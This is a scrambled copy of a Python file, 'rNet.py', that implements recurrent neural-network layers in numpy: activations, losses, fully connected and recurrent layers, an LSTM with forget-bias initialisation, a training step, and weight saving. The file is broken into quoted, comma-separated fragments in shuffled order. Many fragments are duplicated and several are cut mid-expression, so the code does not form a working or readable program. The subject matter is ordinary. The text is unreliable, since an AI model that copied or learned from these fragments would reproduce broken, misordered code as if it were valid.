activations[t,", "batch, self.shape[0]]) dW = np.zeros_like(self.weights) for t in reversed(range(0, time_steps)): dAct = dOut[t]", "tmp_ = np.copy(probs) tmp_[range(train_on.size), train_on] -= 1 return tmp_ class rNet: layers =", "i, l in enumerate(self.layers): l.weights=np.load('%s_%d.npy' % (path,i)) class FC: ''' Fully Connected layer", "activations[t, :, self.shape[1]:2 * self.shape[1]] * dCell[t] # dwrite_i dAct[t, :, 0:self.shape[1]] =", "of columns and rows of the respected matrices ''' dW += np.dot(inputs[t].T, dAct[t])", "is dW=dW_1+...+dW_n Thus dW=x_1.T*dY_1+...+x_n.T*dY_n which is precisely the matrix product dW=x.T*dY where x", "Short Term Memory layer Paper can be found at: http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf ''' shape =", "computes the softmax loss derivative for optimality ''' tmp_ = np.copy(probs) tmp_[range(train_on.size), train_on]", "product Now, we have (x_i) matrix and (dY_i) matrix dW_i=x_i.T*dY_i Our desired result", "paper http://www.jmlr.org/proceedings/papers/v37/jozefowicz15.pdf section 2.2 ''' self.weights = np.random.randn(self.shape[0] + self.shape[1] + 1, 4", "dwrite_i dAct[t, :, 0:self.shape[1]] = activations[t, :, 3 * self.shape[1]:] * dCell[t] #", "outputs[t - 1] if t > 0 else h0 previous_cell = cells[t -", "* dCell[t] # dwrite_i dAct[t, :, 0:self.shape[1]] = activations[t, :, 3 * self.shape[1]:]", "cell = None def __init__(self, shape): self.shape = shape def init(self, forget_bias_init=3): '''", "3 * self.shape[1]:] ** 2) ''' the following line sums the gradients over", "l in range(0, self.num_of_layers()): if cache0 is not None and cache0[l] is not", "'raws': raws, 'outputs': outputs} def time_grad(self, dOut, cache, dCache=None): inputs = cache['inputs'] outputs", "matrices ''' dW += np.dot(inputs[t].T, dAct) dInput[t] = dAct.dot(self.weights.T) dIn[t] = dInput[t, :,", "None def __call__(self, input_tensor): outputs, cache = self.eval_for_back_prop(input=input_tensor, c0=self.cell, h0=self.previous) self.cell = np.copy(cache['cn'])", "<filename>rNet.py<gh_stars>10-100 import numpy as np class tanh: def __call__(self, input): return np.tanh(input) def", "shifted_ = input - np.max(input) exp_ = np.exp(shifted_) return exp_ / np.sum(exp_, axis=1,", "t in reversed(range(0, time_steps)): dCell[t] += (1 - cell_act[t] ** 2) * activations[t,", "+ self.shape[1] + 1, self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) * scale self.weights[-1,", "In other words, a product of two matrices is a sum of tensor", "self.activation(raws[t]) return outputs, {'inputs': inputs, 'raws': raws, 'outputs': outputs, 'h0': h0, 'hn': outputs[-1]}", "batch, self.shape[1]]) if h0 is None: h0 = np.zeros([batch, self.shape[1]]) for t in", "''' shape = None weights = None activation = None def reset(self): pass", "cell = cache['cells'] c0 = cache['c0'] time_steps, batch, out_ = outputs.shape dAct =", "''' it computes the softmax loss derivative for optimality ''' tmp_ = np.copy(probs)", "= self.layers[l].eval_for_back_prop(out) else: out, cache[l] = self.layers[l].eval_for_back_prop(out) cache_out[l] = { 'c0': cache[l]['cn'] if", "in reversed(range(0, time_steps)): dIn[t] = cost.d(out[t], predictions[t]) loss += np.sum(cost(out[t], predictions[t]), axis=0) dW", "np.exp(-raws_[:, 0:3 * self.shape[1]])) activations[t, :, 3 * self.shape[1]:] = np.tanh(raws_[:, 3 *", ":, self.shape[1]:2 * self.shape[1]] = C_previous * dCell[t] dC_previous += activations[t, :, self.shape[1]:2", "return dW, dIn, {'dHidden': dh0} class LSTM: ''' Long Short Term Memory layer", "inputs, 'raws': raws, 'outputs': outputs} def time_grad(self, dOut, cache, dCache=None): inputs = cache['inputs']", ":, 3 * self.shape[1]:] ** 2) ''' the following line sums the gradients", "= None def reset(self): pass def __init__(self, shape, activation=identity()): self.shape = shape self.activation", "stands for the dot product Now, we have (x_i) matrix and (dY_i) matrix", "self.shape[1]]) * activations[t, :, 0:3 * self.shape[1]] dAct[t, :, 3 * self.shape[1]:] *=", "out_ = outputs.shape dAct = np.zeros(activations.shape) dW = np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dCell", "''' Only to be used as the last non-recursive layer ''' def __call__(self,", "0:-1] = input_tensor[t, :, :] inputs[t, :, -1] = 1 raws[t] = inputs[t].dot(self.weights)", "cache[l] = self.layers[l].eval_for_back_prop(out) cache_out[l] = { 'c0': cache[l]['cn'] if 'cn' in cache[l] else", "= dAct.dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]] dh = dH[t - 1] if", "is not None: dH[-1] += np.copy(dH['dHidden']) for t in reversed(range(0, len(dOut))): dAct =", "+ 1, self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) * scale self.weights[-1,] = 0", "= np.zeros([time_steps, batch, self.shape[1]]) if h0 is None: h0 = np.zeros([batch, self.shape[1]]) for", "dAct[t, :, self.shape[1]:2 * self.shape[1]] = C_previous * dCell[t] dC_previous += activations[t, :,", "(1. + np.exp(-raws_[:, 0:3 * self.shape[1]])) activations[t, :, 3 * self.shape[1]:] = np.tanh(raws_[:,", "out_]) loss=0 for t in reversed(range(0, time_steps)): dIn[t] = cost.d(out[t], predictions[t]) loss +=", "previous = outputs[t - 1] if t > 0 else h0 inputs[t, :,", "self.shape[0] + self.shape[1] + 1]) raws = np.zeros([time_steps, batch, self.shape[1]]) outputs = np.zeros([time_steps,", "return outputs, {'inputs': inputs, 'outputs': outputs, 'activations': activations, 'cells': cells, 'cells_act': cells_act, 'h0':", "dCache=None) return loss, dW, cache_out def save(self, path): for i,l in enumerate(self.layers): np.save('%s_%d.npy'%(path,i),l.weights)", "sum of tensor products of columns and rows of the respected matrices '''", "dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dc0 = np.zeros([batch, self.shape[1]])", "'cn': cells[-1]} def time_grad(self, next_grad, cache, dCache=None, mask_start=0): inputs = cache['inputs'] outputs =", "activations = cache['activations'] cell_act = cache['cells_act'] cell = cache['cells'] c0 = cache['c0'] time_steps,", "which is precisely the matrix product dW=x.T*dY where x holds x_i as its", "= np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 1]) outputs = np.zeros([time_steps, batch, self.shape[1]])", "out, _ = self.eval_for_back_prop(input_tensor) return out def eval_for_back_prop(self, input_tensor): time_steps, batch, in_ =", "for l in self.layers: out = l(out) return out def init(self): for l", "= 0 if forget_bias_init != 0: self.weights[- 1, self.shape[1]:2 * self.shape[1]] = forget_bias_init", "dW += np.dot(inputs[t].T, dAct) dIn[t] = dAct.dot(self.weights.T)[:, 0:-1] return dW, dIn, None class", "self.shape[0] + self.shape[1]) * scale self.weights[-1, :] = 0 def reset(self): self.previous =", "cell_act[t] ** 2) * activations[t, :, 2 * self.shape[1]:3 * self.shape[1]] * dH[t]", "> 0 else h0 previous_cell = cells[t - 1] if t > 0", "probs, train_on=None): ''' it computes the softmax loss derivative for optimality ''' tmp_", "1, self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) * scale self.weights[-1,] = 0 def", "raws, 'outputs': outputs, 'h0': h0, 'hn': outputs[-1]} def time_grad(self, dOut, cache, dCache=None): inputs", "batch, self.shape[0] + self.shape[1] + 1]) raws = np.zeros([time_steps, batch, self.shape[1]]) outputs =", "h0 = np.zeros([batch, self.shape[1]]) for t in range(0, time_steps): previous = outputs[t -", "inputs = np.zeros([time_steps, batch, self.shape[0] + 1]) outputs = np.zeros([time_steps, batch, self.shape[1]]) raws", "raws[t] = inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return outputs, {'inputs': inputs, 'raws': raws, 'outputs':", "input): return input * (1 - input) class identity: def __call__(self, input): return", "1, 4 * self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) self.weights[-1, :] = 0", "= inputs for l in range(0, self.num_of_layers()): if cache0 is not None and", "= cache['inputs'] outputs = cache['outputs'] time_steps, batch, out_ = outputs.shape dW = np.zeros(self.weights.shape)", "= activations[t, :, self.shape[1]:2 * self.shape[1]] * previous_cell + \\ activations[t, :, 0:self.shape[1]]", "batch, self.shape[0] + self.shape[1] + 1]) outputs = np.zeros([time_steps, batch, self.shape[1]]) cells =", "inputs = cache['inputs'] outputs = cache['outputs'] time_steps, batch, in_ = inputs.shape dIn =", "raws = np.zeros([time_steps, batch, self.shape[1]]) outputs = np.zeros([time_steps, batch, self.shape[1]]) if h0 is", "- 1] if t > 0 else h0 inputs[t, :, -1] = 1", "/ np.sqrt( self.shape[0] + self.shape[1]) * scale self.weights[-1,] = 0 def __call__(self, input_tensor):", "exp_ = np.exp(shifted_) return exp_ / np.sum(exp_, axis=1, keepdims=True) def d(self, probs, train_on=None):", "is None: h0 = np.zeros([batch, self.shape[1]]) for t in range(0, time_steps): previous =", "+= np.sum(cost(out[t], predictions[t]), axis=0) dW = [None] * self.num_of_layers() for l in reversed(range(0,", "d(self, input): return 1 - input * input class sigmoid: def __call__(self, input):", "self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dc0 = np.zeros([batch, self.shape[1]]) dH = next_grad.copy() if", "dOut[t] * self.activation.d(outputs[t]) ''' the following line sums the gradients over the entire", "1] if t > 0 else dh0 dh += dInput[t, :, self.shape[0]:-1] return", ":, 0:self.shape[1]] * dCell[t] # activations dAct[t, :, 0:3 * self.shape[1]] *= (1.0", "+ np.exp(-input)) def d(self, input): return input * (1 - input) class identity:", "load(self, path): for i, l in enumerate(self.layers): l.weights=np.load('%s_%d.npy' % (path,i)) class FC: '''", "= None activation = None def __init__(self, shape, activation=identity()): self.shape = shape self.activation", "loss derivative for optimality ''' tmp_ = np.copy(probs) tmp_[range(train_on.size), train_on] -= 1 return", "0 def reset(self): self.previous = None def __call__(self, input_tensor): out, cache = self.eval_for_back_prop(input_tensor=input_tensor,", "batch, self.shape[1]]) for t in range(0, time_steps): inputs[t, :, 0:-1] = input_tensor[t, :,", "else: out, cache[l] = self.layers[l].eval_for_back_prop(out) cache_out[l] = { 'c0': cache[l]['cn'] if 'cn' in", "dW=np.outer(x,dY)=x.T*dY -> * stands for the dot product Now, we have (x_i) matrix", "for l in reversed(range(0, self.num_of_layers())): dW[l], dIn, dCache = self.layers[l].time_grad(dIn, cache=cache[l], dCache=None) return", "-np.log(input[range(train_on.size), train_on]) def d(self, probs, train_on=None): ''' it computes the softmax loss derivative", "input_1, input_2): return (input_1 - input_2) / np.size(input_1) class softmax: ''' Only to", "dIn[t] = dAct.dot(self.weights.T)[:, 0:-1] return dW, dIn, None class FCr: ''' Fully Connected", "shape = None weights = None previous = None cell = None def", "/ np.size(input_1) class softmax: ''' Only to be used as the last non-recursive", "None: out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['c0'],cache0[l]['h0']) elif cache0[l]['h0'] is not None: out, cache[l]", "self.shape[1]]) for t in range(0, time_steps): previous = outputs[t - 1] if t", "a single input and dY a single gradient Than dW=np.outer(x,dY)=x.T*dY -> * stands", "= next_grad.copy() if dCache is not None: dCell[-1] += dCache['dCell'] dH[-1] += dCache['dHidden']", "cache['inputs'] outputs = cache['outputs'] time_steps, batch, in_ = inputs.shape dIn = np.zeros([time_steps, batch,", "None def reset(self): self.previous = None self.cell = None def __call__(self, input_tensor): outputs,", "layer ''' def __call__(self, input): shifted_ = input - np.max(input) exp_ = np.exp(shifted_)", "= 1 inputs[t, :, 0:self.shape[0]] = input_tensor[t] inputs[t, :, self.shape[0]:-1] = previous raws[t]", ":, 3 * self.shape[1]:] = np.tanh(raws_[:, 3 * self.shape[1]:]) cells[t] = activations[t, :,", "self.shape[0]:-1] = previous raws_ = inputs[t].dot(self.weights[mask_start:, ]) activations[t, :, 0:3 * self.shape[1]] =", "np.random.randn(self.shape[0] + self.shape[1] + 1, self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) * scale", "cache=cache[l], dCache=None) return loss, dW, cache_out def save(self, path): for i,l in enumerate(self.layers):", "initialization as seen in the paper http://www.jmlr.org/proceedings/papers/v37/jozefowicz15.pdf section 2.2 ''' self.weights = np.random.randn(self.shape[0]", "* self.shape[1]] dAct[t, :, 3 * self.shape[1]:] *= (1.0 - activations[t, :, 3", "1] if t > 0 else h0 previous_cell = cells[t - 1] if", "+ 1]) outputs = np.zeros([time_steps, batch, self.shape[1]]) raws = np.zeros([time_steps, batch, self.shape[1]]) for", "self.shape[1]) * scale self.weights[-1, :] = 0 def reset(self): self.previous = None def", "= None def __init__(self, shape): self.shape = shape def init(self, forget_bias_init=3): ''' forget", "http://www.jmlr.org/proceedings/papers/v37/jozefowicz15.pdf section 2.2 ''' self.weights = np.random.randn(self.shape[0] + self.shape[1] + 1, 4 *", "cell_act = cache['cells_act'] cell = cache['cells'] c0 = cache['c0'] time_steps, batch, out_ =", "cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['h0']) else: out, cache[l] = self.layers[l].eval_for_back_prop(out) else: out, cache[l] =", "''' return 1 class softmax_loss: ''' To be used in combination with sofmax", "* activations[t, :, 3 * self.shape[1]:] cells_act[t] = np.tanh(cells[t]) outputs[t] = activations[t, :,", "in reversed(range(0, self.num_of_layers())): dW[l], dIn, dCache = self.layers[l].time_grad(dIn, cache=cache[l], dCache=None) return loss, dW,", "cache = self.eval_for_back_prop(input=input_tensor, c0=self.cell, h0=self.previous) self.cell = np.copy(cache['cn']) self.previous = np.copy(cache['hn']) return outputs", "a product of two matrices is a sum of tensor products of columns", "dh0 dh += dInput[t, :, self.shape[0]:-1] return dW, dIn, {'dHidden': dh0} class LSTM:", "'h0': cache[l]['hn'] if 'hn' in cache[l] else None} time_steps, batch, out_ = out.shape", "% (path,i)) class FC: ''' Fully Connected layer ''' shape = None weights", "= activation def init(self, scale=1): self.weights = np.random.randn(self.shape[0] + 1, self.shape[1]) / np.sqrt(", "input_tensor): time_steps, batch, in_ = input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0] + 1])", "Paper can be found at: http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf ''' shape = None weights = None", "> 0 else c0 inputs[t, :, -1] = 1 inputs[t, :, 0:self.shape[0]] =", "dH[t] # dout dAct[t, :, 2 * self.shape[1]:3 * self.shape[1]] = cell_act[t] *", "'hn' in cache[l] else None} time_steps, batch, out_ = out.shape dIn = np.zeros([time_steps,", "activations[t, :, 3 * self.shape[1]:] cells_act[t] = np.tanh(cells[t]) outputs[t] = activations[t, :, 2", "if t > 0 else c0 inputs[t, :, -1] = 1 inputs[t, :,", "outputs = cache['outputs'] activations = cache['activations'] cell_act = cache['cells_act'] cell = cache['cells'] c0", "a rank 3 tensor ''' out = input for l in self.layers: out", "init(self): for l in self.layers: l.init() def reset(self): for l in self.layers: l.reset()", "= None cell = None def __init__(self, shape): self.shape = shape def init(self,", "else h0 previous_cell = cells[t - 1] if t > 0 else c0", "__init__(self): self.num_of_layers = lambda: len(self.layers) def __call__(self, input): ''' input is to be", "''' dW += np.dot(inputs[t].T, dAct) dIn[t] = dAct.dot(self.weights.T)[:, 0:-1] return dW, dIn, None", "save(self, path): for i,l in enumerate(self.layers): np.save('%s_%d.npy'%(path,i),l.weights) def load(self, path): for i, l", "np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 1]) raws = np.zeros([time_steps, batch, self.shape[1]]) outputs", "def train_step(self, inputs, predictions, cache0=None, cost=softmax_loss()): cache = [None] * self.num_of_layers() cache_out =", "= self.eval_for_back_prop(input=input_tensor, c0=self.cell, h0=self.previous) self.cell = np.copy(cache['cn']) self.previous = np.copy(cache['hn']) return outputs def", "cache[l] else None, 'h0': cache[l]['hn'] if 'hn' in cache[l] else None} time_steps, batch,", "= np.random.randn(self.shape[0] + self.shape[1] + 1, self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) *", "self.shape[1]] = cell_act[t] * dH[t] C_previous, dC_previous = (cell[t - 1], dCell[t -", "C_previous * dCell[t] dC_previous += activations[t, :, self.shape[1]:2 * self.shape[1]] * dCell[t] #", "+ 1]) raws = np.zeros([time_steps, batch, self.shape[1]]) outputs = np.zeros([time_steps, batch, self.shape[1]]) if", "= np.zeros([time_steps, batch, self.shape[1]]) for t in range(0, time_steps): inputs[t, :, 0:-1] =", "batch, self.shape[1]]) raws = np.zeros([time_steps, batch, self.shape[1]]) for t in range(0, time_steps): inputs[t,", "cache_out def save(self, path): for i,l in enumerate(self.layers): np.save('%s_%d.npy'%(path,i),l.weights) def load(self, path): for", "1]) outputs = np.zeros([time_steps, batch, self.shape[1]]) cells = np.zeros([time_steps, batch, self.shape[1]]) cells_act =", "= cells[t - 1] if t > 0 else c0 inputs[t, :, -1]", "of columns and rows of the respected matrices ''' dW += np.dot(inputs[t].T, dAct)", "inputs[t].dot(self.weights[mask_start:, ]) activations[t, :, 0:3 * self.shape[1]] = 1. / (1. + np.exp(-raws_[:,", "h0 previous_cell = cells[t - 1] if t > 0 else c0 inputs[t,", "np.zeros([time_steps, batch, 4 * self.shape[1]]) if c0 is None: c0 = np.zeros([batch, self.shape[1]])", "dInput = np.zeros(inputs.shape) dCell = np.zeros(cell.shape) dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0 =", "if forget_bias_init != 0: self.weights[- 1, self.shape[1]:2 * self.shape[1]] = forget_bias_init self.previous =", "self.shape[1]:3 * self.shape[1]] = cell_act[t] * dH[t] C_previous, dC_previous = (cell[t - 1],", "shape): self.shape = shape def init(self, forget_bias_init=3): ''' forget bias initialization as seen", "result is dW=dW_1+...+dW_n Thus dW=x_1.T*dY_1+...+x_n.T*dY_n which is precisely the matrix product dW=x.T*dY where", "dAct.dot(self.weights.T)[:, 0:-1] return dW, dIn, None class FCr: ''' Fully Connected recursive layer", "self.cell = np.copy(cache['cn']) self.previous = np.copy(cache['hn']) return outputs def eval_for_back_prop(self, input, c0=None, h0=None,", "else dh0 dh += dInput[t, :, self.shape[0]:-1] return dW, dIn, {'dHidden': dh0, 'dCell':", "= np.zeros([time_steps, batch, self.shape[0]]) dW = np.zeros_like(self.weights) for t in reversed(range(0, time_steps)): dAct", "/ np.sum(exp_, axis=1, keepdims=True) def d(self, probs, train_on=None): ''' it returns 1, as", "inputs[t, :, -1] = 1 raws[t] = inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return outputs,", "product of two matrices is a sum of tensor products of columns and", "dCache['dCell'] dH[-1] += dCache['dHidden'] for t in reversed(range(0, time_steps)): dCell[t] += (1 -", "self.layers[l].eval_for_back_prop(out) cache_out[l] = { 'c0': cache[l]['cn'] if 'cn' in cache[l] else None, 'h0':", "self.shape[1]:2 * self.shape[1]] * previous_cell + \\ activations[t, :, 0:self.shape[1]] * activations[t, :,", "out_ = out.shape dIn = np.zeros([time_steps, batch, out_]) loss=0 for t in reversed(range(0,", "for i,l in enumerate(self.layers): np.save('%s_%d.npy'%(path,i),l.weights) def load(self, path): for i, l in enumerate(self.layers):", "x be a single input and dY a single gradient Than dW=np.outer(x,dY)=x.T*dY ->", "matrix product dW=x.T*dY where x holds x_i as its rows and dY holds", "+ 1, self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) * scale self.weights[-1, :] =", "- 1] if t > 0 else h0 previous_cell = cells[t - 1]", "0:3 * self.shape[1]] = 1. / (1. + np.exp(-raws_[:, 0:3 * self.shape[1]])) activations[t,", "np.max(input) exp_ = np.exp(shifted_) return exp_ / np.sum(exp_, axis=1, keepdims=True) def d(self, probs,", "dAct[t]) dInput[t] = dAct[t].dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]] dh = dH[t -", "x holds x_i as its rows and dY holds dY_i as its rows", "self.shape[1]])) activations[t, :, 3 * self.shape[1]:] = np.tanh(raws_[:, 3 * self.shape[1]:]) cells[t] =", "* self.shape[1]:] *= (1.0 - activations[t, :, 3 * self.shape[1]:] ** 2) '''", "h0=None, mask_start=0): time_steps, batch, in_ = input.shape inputs = np.zeros([time_steps, batch, self.shape[0] +", "respected matrices ''' dW += np.dot(inputs[t].T, dAct[t]) dInput[t] = dAct[t].dot(self.weights.T) dIn[t] = dInput[t,", "''' self.weights = np.random.randn(self.shape[0] + self.shape[1] + 1, 4 * self.shape[1]) / np.sqrt(", "# dout dAct[t, :, 2 * self.shape[1]:3 * self.shape[1]] = cell_act[t] * dH[t]", "None def reset(self): pass def __init__(self, shape, activation=identity()): self.shape = shape self.activation =", "1. / (1. + np.exp(-raws_[:, 0:3 * self.shape[1]])) activations[t, :, 3 * self.shape[1]:]", "input_tensor[t, :, :] inputs[t, :, -1] = 1 raws[t] = inputs[t].dot(self.weights) outputs[t] =", "= inputs[t].dot(self.weights[mask_start:, ]) activations[t, :, 0:3 * self.shape[1]] = 1. / (1. +", "batch, in_ = input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0] + 1]) outputs =", "time_steps): previous = outputs[t - 1] if t > 0 else h0 previous_cell", "cells[t] = activations[t, :, self.shape[1]:2 * self.shape[1]] * previous_cell + \\ activations[t, :,", "input for l in self.layers: out = l(out) return out def init(self): for", "can be found at: http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf ''' shape = None weights = None previous", "cache_out = [None] * self.num_of_layers() out = inputs for l in range(0, self.num_of_layers()):", "self.shape[1] + 1]) raws = np.zeros([time_steps, batch, self.shape[1]]) outputs = np.zeros([time_steps, batch, self.shape[1]])", "Term Memory layer Paper can be found at: http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf ''' shape = None", "__call__(self, input): ''' input is to be a rank 3 tensor ''' out", "cache_out[l] = { 'c0': cache[l]['cn'] if 'cn' in cache[l] else None, 'h0': cache[l]['hn']", "= shape self.activation = activation def init(self, scale=1): self.weights = np.random.randn(self.shape[0] + self.shape[1]", "* self.shape[1]:] = np.tanh(raws_[:, 3 * self.shape[1]:]) cells[t] = activations[t, :, self.shape[1]:2 *", "None: dCell[-1] += dCache['dCell'] dH[-1] += dCache['dHidden'] for t in reversed(range(0, time_steps)): dCell[t]", "dh0 = np.zeros([batch, self.shape[1]]) dc0 = np.zeros([batch, self.shape[1]]) dH = next_grad.copy() if dCache", "np.zeros(inputs.shape) dCell = np.zeros(cell.shape) dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]])", "matrix dW_i=x_i.T*dY_i Our desired result is dW=dW_1+...+dW_n Thus dW=x_1.T*dY_1+...+x_n.T*dY_n which is precisely the", "cache['outputs'] time_steps, batch, out_ = outputs.shape dW = np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dIn", "dW_i=x_i.T*dY_i Our desired result is dW=dW_1+...+dW_n Thus dW=x_1.T*dY_1+...+x_n.T*dY_n which is precisely the matrix", "t > 0 else (c0, dc0) # dforget dAct[t, :, self.shape[1]:2 * self.shape[1]]", "= np.exp(shifted_) return exp_ / np.sum(exp_, axis=1, keepdims=True) def d(self, probs, train_on=None): '''", "predictions[t]), axis=0) dW = [None] * self.num_of_layers() for l in reversed(range(0, self.num_of_layers())): dW[l],", "- input_2) / np.size(input_1) class softmax: ''' Only to be used as the", ":, 2 * self.shape[1]:3 * self.shape[1]] * dH[t] # dout dAct[t, :, 2", "def reset(self): pass def __init__(self, shape, activation=identity()): self.shape = shape self.activation = activation", "= outputs.shape dW = np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dIn = np.zeros([time_steps, batch, self.shape[0]])", "0:self.shape[0]] = input[t] inputs[t, :, self.shape[0]:-1] = previous raws_ = inputs[t].dot(self.weights[mask_start:, ]) activations[t,", "activations[t, :, 0:3 * self.shape[1]] = 1. / (1. + np.exp(-raws_[:, 0:3 *", "dC_previous = (cell[t - 1], dCell[t - 1]) if t > 0 else", "dIn, {'dHidden': dh0} class LSTM: ''' Long Short Term Memory layer Paper can", ":] = 0 if forget_bias_init != 0: self.weights[- 1, self.shape[1]:2 * self.shape[1]] =", "3 * self.shape[1]:] = activations[t, :, 0:self.shape[1]] * dCell[t] # activations dAct[t, :,", "is covered by a previous call to softmax_loss function ''' return 1 class", "3 * self.shape[1]:] = np.tanh(raws_[:, 3 * self.shape[1]:]) cells[t] = activations[t, :, self.shape[1]:2", "-= 1 return tmp_ class rNet: layers = [] num_of_layers = None def", "inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 1]) outputs = np.zeros([time_steps, batch,", "dW[l], dIn, dCache = self.layers[l].time_grad(dIn, cache=cache[l], dCache=None) return loss, dW, cache_out def save(self,", "softmax: ''' Only to be used as the last non-recursive layer ''' def", "''' def __call__(self, input): shifted_ = input - np.max(input) exp_ = np.exp(shifted_) return", "+= np.dot(inputs[t].T, dAct) dIn[t] = dAct.dot(self.weights.T)[:, 0:-1] return dW, dIn, None class FCr:", "cache['outputs'] time_steps, batch, in_ = inputs.shape dIn = np.zeros([time_steps, batch, self.shape[0]]) dW =", "-1] = 1 inputs[t, :, 0:self.shape[0]] = input[t] inputs[t, :, self.shape[0]:-1] = previous", "** 2) * activations[t, :, 2 * self.shape[1]:3 * self.shape[1]] * dH[t] #", "inputs[t, :, self.shape[0]:-1] = previous raws[t] = inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return outputs,", "dW=dW_1+...+dW_n Thus dW=x_1.T*dY_1+...+x_n.T*dY_n which is precisely the matrix product dW=x.T*dY where x holds", "reversed(range(0, len(dOut))): dAct = dH[t] * self.activation.d(outputs[t]) ''' the following line sums the", "self.weights = np.random.randn(self.shape[0] + self.shape[1] + 1, 4 * self.shape[1]) / np.sqrt( self.shape[0]", "* scale self.weights[-1,] = 0 def __call__(self, input_tensor): out, _ = self.eval_for_back_prop(input_tensor) return", "* self.shape[1]:] ** 2) ''' the following line sums the gradients over the", "of two matrices is a sum of tensor products of columns and rows", "out = l(out) return out def init(self): for l in self.layers: l.init() def", "out.shape dIn = np.zeros([time_steps, batch, out_]) loss=0 for t in reversed(range(0, time_steps)): dIn[t]", "= cache['outputs'] time_steps, batch, in_ = inputs.shape dIn = np.zeros([time_steps, batch, self.shape[0]]) dW", "''' shape = None weights = None previous = None activation = None", "/ np.sqrt( self.shape[0] + self.shape[1]) * scale self.weights[-1, :] = 0 def reset(self):", "return input def d(self, input): return 1 class mean_square: def __call__(self, input_1, input_2):", "= None def __init__(self, shape, activation=identity()): self.shape = shape self.activation = activation def", "activations[t, :, 3 * self.shape[1]:] = np.tanh(raws_[:, 3 * self.shape[1]:]) cells[t] = activations[t,", "dW += np.dot(inputs[t].T, dAct) dInput[t] = dAct.dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]] dh", "__call__(self, input_1, input_2): return np.mean(np.square(input_1 - input_2) / 2, axis=1,keepdims=True) def d(self, input_1,", ":, 3 * self.shape[1]:] * dCell[t] # dwrite_c dAct[t, :, 3 * self.shape[1]:]", "return np.tanh(input) def d(self, input): return 1 - input * input class sigmoid:", "batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dc0 = np.zeros([batch, self.shape[1]]) dH = next_grad.copy()", "= cell_act[t] * dH[t] C_previous, dC_previous = (cell[t - 1], dCell[t - 1])", "in reversed(range(0, time_steps)): dAct = dOut[t] * self.activation.d(outputs[t]) ''' the following line sums", "np.mean(np.square(input_1 - input_2) / 2, axis=1,keepdims=True) def d(self, input_1, input_2): return (input_1 -", "= np.zeros([batch, self.shape[1]]) dH = dOut.copy() if dCache is not None: dH[-1] +=", "dY holds dY_i as its rows In other words, a product of two", ":, 0:self.shape[1]] = activations[t, :, 3 * self.shape[1]:] * dCell[t] # dwrite_c dAct[t,", "dAct) dIn[t] = dAct.dot(self.weights.T)[:, 0:-1] return dW, dIn, None class FCr: ''' Fully", "self.shape[1]:2 * self.shape[1]] = forget_bias_init self.previous = None self.cell = None def reset(self):", "[] num_of_layers = None def __init__(self): self.num_of_layers = lambda: len(self.layers) def __call__(self, input):", "= None def reset(self): self.previous = None self.cell = None def __call__(self, input_tensor):", "[None] * self.num_of_layers() for l in reversed(range(0, self.num_of_layers())): dW[l], dIn, dCache = self.layers[l].time_grad(dIn,", "def eval_for_back_prop(self, input_tensor): time_steps, batch, in_ = input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0]", "in the paper http://www.jmlr.org/proceedings/papers/v37/jozefowicz15.pdf section 2.2 ''' self.weights = np.random.randn(self.shape[0] + self.shape[1] +", "(1.0 - activations[t, :, 3 * self.shape[1]:] ** 2) ''' the following line", "= cache['outputs'] activations = cache['activations'] cell_act = cache['cells_act'] cell = cache['cells'] c0 =", "+ self.shape[1] + 1]) outputs = np.zeros([time_steps, batch, self.shape[1]]) cells = np.zeros([time_steps, batch,", ":, 3 * self.shape[1]:] = activations[t, :, 0:self.shape[1]] * dCell[t] # activations dAct[t,", "outputs, {'inputs': inputs, 'raws': raws, 'outputs': outputs} def time_grad(self, dOut, cache, dCache=None): inputs", "c0 is None: c0 = np.zeros([batch, self.shape[1]]) if h0 is None: h0 =", "= 0 def __call__(self, input_tensor): out, _ = self.eval_for_back_prop(input_tensor) return out def eval_for_back_prop(self,", "def __init__(self, shape): self.shape = shape def init(self, forget_bias_init=3): ''' forget bias initialization", "input[t] inputs[t, :, self.shape[0]:-1] = previous raws_ = inputs[t].dot(self.weights[mask_start:, ]) activations[t, :, 0:3", "outputs, 'activations': activations, 'cells': cells, 'cells_act': cells_act, 'h0': h0, 'c0': c0, 'hn': outputs[-1],", "matrix and (dY_i) matrix dW_i=x_i.T*dY_i Our desired result is dW=dW_1+...+dW_n Thus dW=x_1.T*dY_1+...+x_n.T*dY_n which", "= np.zeros([time_steps, batch, self.shape[0] + 1]) outputs = np.zeros([time_steps, batch, self.shape[1]]) raws =", "return 1 class softmax_loss: ''' To be used in combination with sofmax '''", "= np.zeros([time_steps, batch, self.shape[1]]) cells_act = np.zeros([time_steps, batch, self.shape[1]]) activations = np.zeros([time_steps, 